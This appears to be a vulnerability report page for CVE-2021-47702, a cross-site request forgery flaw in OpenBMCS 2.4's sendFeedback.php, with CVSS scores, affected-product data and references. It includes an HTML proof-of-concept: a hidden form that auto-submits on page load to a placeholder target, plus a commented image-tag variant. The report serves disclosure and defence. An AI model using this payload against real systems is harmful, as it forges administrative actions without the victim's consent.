Security Vulnerability Report
CVE-2021-47702 CVSS 4.3 MEDIUM


Published: 2025-12-09 21:15:49
Last Modified: 2025-12-19 19:40:25

Description

OpenBMCS 2.4 contains a CSRF vulnerability that allows attackers to perform actions with administrative privileges by exploiting the sendFeedback.php endpoint. Attackers can submit malicious requests to trigger unintended actions, such as sending emails or modifying system settings.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openbmcs:openbmcs:2.4:*:*:*:*:*:*:* - VULNERABLE
OpenBMCS 2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CSRF PoC for CVE-2021-47702 - OpenBMCS 2.4 sendFeedback.php -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Attack PoC - CVE-2021-47702</title>
</head>
<body>
  <h1>CSRF PoC for OpenBMCS 2.4</h1>
  <p>This PoC demonstrates the CSRF vulnerability in sendFeedback.php</p>

  <!-- Auto-submit form to trigger malicious feedback submission -->
  <form id="csrfForm" action="http://target-openbmcs/sendFeedback.php" method="POST" style="display:none;">
    <input type="hidden" name="feedback_subject" value="System Alert">
    <input type="hidden" name="feedback_message" value="Malicious feedback content injected by attacker">
    <input type="hidden" name="feedback_email" value="[email protected]">
    <input type="hidden" name="submit" value="Submit">
  </form>

  <script>
    // Auto-submit the form when page loads
    document.getElementById('csrfForm').submit();
  </script>

  <p>If you see this message, the attack may have failed.</p>
</body>
</html>

<!-- Alternative: Image tag-based GET request (if endpoint supports GET) -->
<!-- <img src="http://target-openbmcs/sendFeedback.php?subject=Malicious&message=CSRF" width="0" height="0"> -->

References

https://www.exploit-db.com/exploits/50667 (Exploit, Third Party Advisory, VDB Entry)
https://www.openbmcs.com (Product)
https://www.vulncheck.com/advisories/openbmcs-cross-site-request-forgery-csrf-via-sendfeedbackphp (Third Party Advisory)
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php (Exploit, Third Party Advisory)

Record Details (from the NVD JSON record)

Vulnerability Status: Analyzed
Weakness: CWE-352
CVSS 3.1 (Primary): Base Score 4.3 MEDIUM, Exploitability Score 2.8, Impact Score 1.4
CVSS 4.0 (Secondary): Base Score 5.3 MEDIUM
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CPE Match Criteria ID: E3963F28-1F3E-488E-A815-FA0BD370105D